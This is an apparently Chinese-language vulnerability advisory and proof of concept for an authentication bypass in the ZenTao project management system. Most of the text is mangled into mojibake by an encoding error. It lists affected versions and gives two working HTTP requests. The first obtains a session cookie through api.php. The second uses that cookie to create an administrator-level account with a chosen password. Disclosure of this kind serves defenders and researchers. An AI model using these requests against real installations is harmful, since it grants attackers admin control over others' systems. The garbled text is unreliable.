N/A£üìøµÀÏîÄ¿¹ÜÀíϵͳÉí·ÝÈÏÖ¤Èƹý©¶´£¨POC£©

0x00 Ç°ÑÔ

ìøµÀÊÇÓÉÇൺÒ×ÈíÌì´´ÍøÂç¿Æ¼¼ÓÐÏÞ¹«Ë¾¿ª·¢µÄ¿ªÔ´ÏîÄ¿¹ÜÀíÈí¼þ£¬»ùÓÚÃô½ÝºÍCMMI¹ÜÀíÀíÄî½øÐÐÉè¼Æ£¬¼¯²úÆ·¹ÜÀí¡¢ÏîÄ¿¹ÜÀí¡¢ÖÊÁ¿¹ÜÀí¡¢Îĵµ¹ÜÀí¡¢×éÖ¯¹ÜÀíºÍÊÂÎñ¹ÜÀíÓÚÒ»Ì壬ÍêÕû¸²¸ÇÑз¢ÏîÄ¿¹ÜÀíµÄºËÐÄÁ÷³Ì¡£

0x01 ©¶´ÃèÊö

ìøµÀÏîÄ¿¹ÜÀíϵͳ´æÔÚÉí·ÝÈÏÖ¤Èƹý©¶´£¬Ô¶³Ì¹¥»÷ÕßÀûÓø鶴¿ÉÒÔÈƹýÉí·ÝÈÏÖ¤£¬µ÷ÓÃÈÎÒâAPI½Ó¿Ú²¢Ð޸ĹÜÀíÔ±Óû§µÄÃÜÂ룬²¢ÒÔ¹ÜÀíÔ±Óû§µÇ¼¸Ãϵͳ¡£

0x02 CVE񅧏

ÎÞ

0x03 Ó°Ïì°æ±¾

v16.x<=ìøµÀ< v18.12£¨¿ªÔ´°æ£©

v6.x<=ìøµÀ< v8.12£¨ÆóÒµ°æ£©

v3.x<=ìøµÀ< v4.12£¨Æì½¢°æ£©

0x04 ©¶´ÏêÇé

POC£º

»ñÈ¡zentaosidµÄÖµ

GET /zentao/api.php?m=testcase&f=savexmindimport&HTTP_X_REQUESTED_WITH=XMLHttpRequest&productID=upkbbehwgfscwizoglpw&branch=zqbcsfncxlpopmrvchsu HTTP/1.1
Host: you-ip

?

Ìí¼ÓÓû§£º

POST /zentao/api.php/v1/users HTTP/1.1
Cookie: zentaosid=xxxxxxxxxx
Host: you-ip

{"account": "zxczxc123", "password": "admin@123", "realname": "zxczxc123", "role": "top", "group": "1"}

·µ»Ø403Ò²¿ÉÒԵǽ¡£

0x05 ²Î¿¼Á´½Ó

https://github.com/easysoft/zentaopms

https://github.com/easysoft/zentaopms/commit/d13ba70016ca981b08f27e08fb934bf1f23a4135

https://github.com/easysoft/zentaopms/commit/695055c6b1d2e6a8c944bdbc38308c06820c40ce